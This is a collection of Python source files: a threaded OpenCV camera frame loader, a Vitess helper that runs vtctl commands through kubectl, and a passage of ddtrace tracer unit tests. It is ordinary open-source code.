camera: (int, str) Source of camera or video.,
preprocess: (Callable function) to process the frame before return.
"""
def __init__(self, source, preprocess=None, ori_return=False):
self.source = source
self.stream = cv2.VideoCapture(source)
assert self.stream.isOpened(), f'Cannot read camera source! {source}'
self.fps = self.stream.get(cv2.CAP_PROP_FPS)
self.frame_size = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
self.stopped = False
self.ret = False
self.frame = None
self.ori_frame = None
self.read_lock = Lock()
self.ori = ori_return
self.preprocess_fn = preprocess
def start(self):
self.t = Thread(target=self.update, args=()) # , daemon=True)
self.t.start()
c = 0
while not self.ret:
time.sleep(0.1)
c += 1
if c > 20:
self.stop()
# raise TimeoutError('Can not get a frame from camera!!!')
logging.error(f'Can not read frame from {self.source}')
break
return self
def update(self):
while not self.stopped:
ret, frame = self.stream.read()
self.read_lock.acquire()
if frame is None:
logging.warning(f'Failed to read frame from {self.source}')
self.read_lock.release()
continue
self.ori_frame = frame.copy()
if ret and self.preprocess_fn is not None:
frame = self.preprocess_fn(frame)
self.ret, self.frame = ret, frame
self.read_lock.release()
time.sleep(30)
def grabbed(self):
"""Return `True` if can read a frame."""
return self.ret
def getitem(self):
self.read_lock.acquire()
frame = self.frame.copy()
ori_frame = self.ori_frame.copy()
self.read_lock.release()
if self.ori:
return frame, ori_frame
else:
return frame
def stop(self):
if self.stopped:
return
self.stopped = True
if self.t.is_alive():
self.t.join()
self.stream.release()
def is_running(self):
return not self.stopped
def __del__(self):
if self.stream.isOpened():
self.stream.release()
def __exit__(self, exc_type, exc_val, exc_tb):
if self.stream.isOpened():
self.stream.release()
class CamLoader_Q:
"""Use threading and queue to capture a frame and store to queue for pickup in sequence.
Recommend for video file.
Args:
camera: (int, str) Source of camera or video.,
batch_size: (int) Number of batch frame to store in queue. Default: 1,
queue_size: (int) Maximum queue size. Default: 256,
preprocess: (Callable function) to process the frame before return.
"""
def __init__(self, camera, batch_size=1, queue_size=256, preprocess=None):
self.stream = cv2.VideoCapture(camera)
assert self.stream.isOpened(), 'Cannot read camera source!'
self.fps = self.stream.get(cv2.CAP_PROP_FPS)
self.frame_size = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
# Queue for storing each frames.
self.stopped = False
self.batch_size = batch_size
self.Q = Queue(maxsize=queue_size)
self.preprocess_fn = preprocess
def start(self):
t = Thread(target=self.update, args=(), daemon=True).start()
c = 0
while not self.grabbed():
time.sleep(0.1)
c += 1
if c > 20:
self.stop()
raise TimeoutError('Can not get a frame from camera!!!')
return self
def update(self):
while not self.stopped:
if not self.Q.full():
frames = []
for k in range(self.batch_size):
ret, frame = self.stream.read()
if not ret:
self.stop()
return
if self.preprocess_fn is not None:
frame = self.preprocess_fn(frame)
frames.append(frame)
frames = np.stack(frames)
self.Q.put(frames)
else:
with self.Q.mutex:
self.Q.queue.clear()
# time.sleep(0.05)
def grabbed(self):
"""Return `True` if can read a frame."""
return self.Q.qsize() > 0
def getitem(self):
return self.Q.get().squeeze()
def stop(self):
if self.stopped:
return
self.stopped = True
self.stream.release()
def __len__(self):
return self.Q.qsize()
def __del__(self):
if self.stream.isOpened():
self.stream.release()
def __exit__(self, exc_type, exc_val, exc_tb):
if self.stream.isOpened():
self.stream.release()
|
vtctl_sandbox.py
|
# Copyright 2019 The Vitess Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrapper around vtctl execute_vtctl_command for sandboxes.
Note: This also provides a backup option of using kvtctl.sh, a kubernetes script
used to temporarily forward a port if vtctld has no forwarded port.
TODO(thompsonja): This is heavily tied to the kubernetes and will need to be
updated if other systems are used.
"""
import json
import os
import subprocess
import threading
import time
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.stdout = None
self.stderr = None
def run(self, timeout_s):
"""Runs the vtctl command."""
def target():
self.process = subprocess.Popen(self.cmd, stdout=subprocess.PIPE)
self.stdout, self.stderr = self.process.communicate()
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout_s)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.process.returncode
def execute_vtctl_command(vtctl_args, namespace='default', timeout_s=180):
"""Executes a vtctl command with some retry logic."""
vtctl_cmd_args = []
vtctld_info = json.loads(subprocess.check_output(
['kubectl', 'get', 'service', 'vtctld', '--namespace=%s' % namespace,
'-o', 'json']))
try:
# Check to see if the vtctld service has a forwarded port.
ip = vtctld_info['status']['loadBalancer']['ingress'][0]['ip']
vtctl_cmd_args = ['vtctlclient', '-server', '%s:15999' % ip] + vtctl_args
except (KeyError, IndexError):
pass
if not vtctl_cmd_args:
# Default to trying to use kvtctl.sh if a forwarded port cannot be found.
os.environ['VITESS_NAME'] = namespace
vtctl_cmd_args = (
[os.path.join(os.environ['VTTOP'], 'examples/kubernetes/kvtctl.sh')]
+ vtctl_args)
start_time = time.time()
while time.time() - start_time < timeout_s:
cmd = Command(vtctl_cmd_args)
retcode = cmd.run(10)
if cmd.stdout.startswith('Starting port forwarding'):
# Ignore this extra output line if using kvtctl.sh
cmd.stdout = cmd.stdout[cmd.stdout.find('\n')+1:]
if retcode:
last_error = 'Failed w/ errorcode %d, stdout %s, stderr %s' % (
cmd.process.returncode, cmd.stdout, cmd.stderr)
else:
return cmd.stdout, True
return ('Last error running %s: %s' % (' '.join(vtctl_cmd_args), last_error),
False)
|
test_tracer.py
|
# -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
import warnings
from unittest.case import SkipTest
import mock
import pytest
from ddtrace.vendor import six
import ddtrace
from ddtrace.tracer import Tracer
from ddtrace.ext import system, priority
from ddtrace.context import Context
from ddtrace.constants import (
VERSION_KEY,
ENV_KEY,
SAMPLING_PRIORITY_KEY,
ORIGIN_KEY,
HOSTNAME_KEY,
MANUAL_KEEP_KEY,
MANUAL_DROP_KEY,
)
from tests.subprocesstest import run_in_subprocess
from tests import TracerTestCase, DummyWriter, DummyTracer, override_global_config
from ddtrace.internal.writer import LogWriter, AgentWriter
def get_dummy_tracer():
return DummyTracer()
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
# a weird case where manually calling finish with an unserializable
# span was causing an loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.get_call_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
# Tracer Context Provider must return a Context object
# even if empty
ctx = self.tracer.context_provider.active()
assert isinstance(ctx, Context)
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.start_span("web.request")
span.assert_matches(
name="web.request",
tracer=self.tracer,
_parent=None,
parent_id=None,
)
span.finish()
assert self.tracer.active_span() == span
assert self.tracer.active_root_span() == span
spans = self.tracer.writer.pop()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided a default
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
assert self.tracer.current_span() == child
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=root,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_runtime_worker(self):
# by default runtime worker not started though runtime id is set
self.assertIsNone(self.tracer._runtime_worker)
# configure tracer with runtime metrics collection
self.tracer.configure(collect_metrics=True)
self.assertIsNotNone(self.tracer._runtime_worker)
def test_configure_dogstatsd_host(self):
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
self.tracer.configure(dogstatsd_host="foo")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 8125
# verify warnings triggered
assert len(ws) >= 1
for w in ws:
if issubclass(w.category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning):
assert "Use `dogstatsd_url`" in str(w.message)
break
else:
assert 0, "dogstatsd warning not found"
def test_configure_dogstatsd_host_port(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.tracer.configure(dogstatsd_host="foo", dogstatsd_port="1234")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 1234
# verify warnings triggered
assert len(w) >= 2
assert issubclass(w[0].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert "Use `dogstatsd_url`" in str(w[0].message)
assert issubclass(w[1].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert "Use `dogstatsd_url`" in str(w[1].message)
def test_configure_dogstatsd_url_host_port(self):
self.tracer.configure(dogstatsd_url="foo:1234")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 1234
def test_configure_dogstatsd_url_socket(self):
self.tracer.configure(dogstatsd_url="unix:///foo.sock")
assert self.tracer._dogstatsd_client.host is None
assert self.tracer._dogstatsd_client.port is None
assert self.tracer._dogstatsd_client.socket_path == "/foo.sock"
def test_span_no_runtime_tags(self):
self.tracer.configure(collect_metrics=False)
with self.start_span("root") as root:
with self.start_span("child", child_of=root.context) as child:
pass
self.assertIsNone(root.get_tag("language"))
self.assertIsNone(child.get_tag("language"))
def test_only_root_span_runtime_internal_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("custom", "template", "web", "worker"):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") == "python"
assert child.get_tag("language") is None
def test_only_root_span_runtime_external_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in (
"algoliasearch.search",
"boto",
"cache",
"cassandra",
"elasticsearch",
"grpc",
"kombu",
"http",
"memcached",
"redis",
"sql",
"vertica",
):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") is None
assert child.get_tag("language") is None
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer._hostname == "localhost"
assert t.writer._port == 8126
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer._hostname == "foobar"
assert t.writer._port == 12
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer._uds_path == "/foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer._hostname == "localhost"
assert t.writer._port == 80
assert not t.writer._https
t = ddtrace.Tracer(url="https://localhost")
assert t.writer._hostname == "localhost"
assert t.writer._port == 443
assert t.writer._https
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert str(e) == "Unknown scheme `https` for agent URL"
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert not t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=None)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Make sure we aren't calling stop for an unstarted writer
t.configure(hostname="localhost", port=8126)
assert not orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t._dogstatsd_client.host == "localhost"
assert t._dogstatsd_client.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t._dogstatsd_client.host == "foobar"
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t._dogstatsd_client.host == "foobar"
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t._dogstatsd_client.socket_path == "/var/run/statsd.sock"
t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t._dogstatsd_client.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer != original_writer
assert t.writer._buffer != original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 0
assert len(t.writer._buffer) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._buffer == original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 1
assert len(t.writer._buffer) == 1
def test_tracer_trace_across_fork():
"""
When a trace is started in a parent process and a child process is spawned
The trace should be continued in the child process
"""
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
def task(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 1
(child,) = children
assert parent.trace_id == child["trace_id"]
assert child["parent_id"] == parent.span_id
def test_tracer_trace_across_multiple_forks():
"""
When a trace is started and crosses multiple process boundaries
The trace should be continued in the child processes
"""
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
# Start a span in this process then start a child process which itself
# starts a span and spawns another child process which starts a span.
def task(tracer, q):
tracer.writer = DummyWriter()
def task2(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child2"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
with tracer.trace("child1"):
q2 = multiprocessing.Queue()
p = multiprocessing.Process(target=task2, args=(tracer, q2))
p.start()
p.join()
task2_spans = q2.get()
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id, span_id=s.span_id) for s in spans] + task2_spans)
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 2
child1, child2 = children
assert parent.trace_id == child1["trace_id"] == child2["trace_id"]
assert child1["parent_id"] == parent.span_id
assert child2["parent_id"] == child1["span_id"]
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env(self):
assert isinstance(self.tracer.original_writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
assert isinstance(self.tracer.original_writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
